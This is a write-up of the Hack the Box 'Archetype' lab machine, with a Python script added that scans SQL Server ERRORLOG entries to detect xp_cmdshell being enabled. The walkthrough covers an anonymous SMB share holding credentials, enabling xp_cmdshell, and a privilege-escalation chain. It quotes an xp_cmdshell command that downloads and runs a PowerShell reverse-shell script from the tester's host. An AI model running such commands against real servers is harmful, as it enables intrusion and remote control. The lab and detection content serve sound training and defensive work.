Hack the Box — Archetype
Performing a basic nmap scan shows that port 445 is open. Let's try to list the SMB shares without a password. For this I used smbclient. I tried connecting to every share present. After that I tried connecting to the non-administrative share "backups" and succeeded. An interesting file contained a username and password for an unknown service.
After googling the file, I learned that it is used by SQL Server, and we had "Microsoft SQL Server" running on port 1433. So I used the credentials obtained to connect using impacket's "mssqlclient.py".
Typing the help command gave information about "xp_cmdshell".
xp_cmdshell is a built-in extended stored procedure of Microsoft SQL Server. With it we have the ability to run any command-line process, so we can embed it within our stored procedures, jobs or batch processing. But this option is disabled by default, and turning it on requires the ALTER SETTINGS permission that sysadmin and serveradmin hold.
So I enabled xp_cmdshell, tried executing commands and got output.
After that, I hosted this PowerShell script to get a reverse shell back to my machine and executed it on the remote machine via this command:
xp_cmdshell "powershell \"IEX (New-Object Net.WebClient).DownloadString('http://10.10.14.31:7878/shelly.ps1');\""
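As an added defensive example that is not part of the original write-up: SQL Server records every sp_configure change in its ERRORLOG, so an xp_cmdshell enablement like the one above leaves a trace. The log lines below are constructed in that format; the script flags watched options being switched on and reports how long xp_cmdshell stayed enabled, since switching it back off does not undo what ran in between.

```python
import re
from typing import Dict, List, Optional, Tuple

# Constructed sample in the format SQL Server uses for sp_configure changes in its
# ERRORLOG (these lines are not from the original write-up).
SAMPLE_ERRORLOG = """\
2020-01-01 10:00:00.10 spid51      Configuration option 'show advanced options' changed from 0 to 1. Run the RECONFIGURE statement to install.
2020-01-01 10:00:01.20 spid51      Configuration option 'xp_cmdshell' changed from 0 to 1. Run the RECONFIGURE statement to install.
2020-01-01 10:03:15.00 spid52      Configuration option 'max server memory (MB)' changed from 2147483647 to 4096. Run the RECONFIGURE statement to install.
2020-01-01 10:45:00.00 spid51      Configuration option 'xp_cmdshell' changed from 1 to 0. Run the RECONFIGURE statement to install.
"""

CONFIG_CHANGE = re.compile(
    r"^(?P<ts>\d{4}-\d\d-\d\d \d\d:\d\d:\d\d\.\d+)\s+(?P<spid>spid\d+)\s+"
    r"Configuration option '(?P<option>[^']+)' changed from (?P<old>\d+) to (?P<new>\d+)\."
)

# Options that give anyone with sysadmin on the instance OS-level command execution.
WATCHED_OPTIONS = {"xp_cmdshell", "Ole Automation Procedures"}


def parse_config_changes(log_text: str) -> List[Dict[str, str]]:
    """Return every configuration-change event in the log, in file order."""
    return [m.groupdict() for m in map(CONFIG_CHANGE.match, log_text.splitlines()) if m]


def risky_enablements(events: List[Dict[str, str]]) -> List[Dict[str, str]]:
    """Events that switch a watched option from off to on; each one deserves an alert."""
    return [e for e in events
            if e["option"] in WATCHED_OPTIONS and e["old"] == "0" and e["new"] != "0"]


def exposure_windows(events: List[Dict[str, str]],
                     option: str = "xp_cmdshell") -> List[Tuple[str, Optional[str]]]:
    """(enabled_at, disabled_at) pairs for one option; disabled_at is None while it is still on.
    Every window is reported, even ones that were closed again later in the log."""
    windows: List[Tuple[str, Optional[str]]] = []
    open_since: Optional[str] = None
    for e in (e for e in events if e["option"] == option):
        if e["new"] != "0" and open_since is None:
            open_since = e["ts"]                    # option just came on
        elif e["new"] == "0" and open_since is not None:
            windows.append((open_since, e["ts"]))   # option went off again
            open_since = None
    if open_since is not None:
        windows.append((open_since, None))          # never turned off in this log
    return windows
```

Run the same parser over the live ERRORLOG and page on any non-empty result of risky_enablements; an xp_cmdshell window with no change ticket behind it is worth an investigation on its own.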
Time for Escalating Privilege
Then I downloaded winpeas.exe from PowerShell on the remote machine and found a PowerShell log file that contained the administrator's credentials.
After that, I used impacket's "psexec.py" to log in to the administrator account.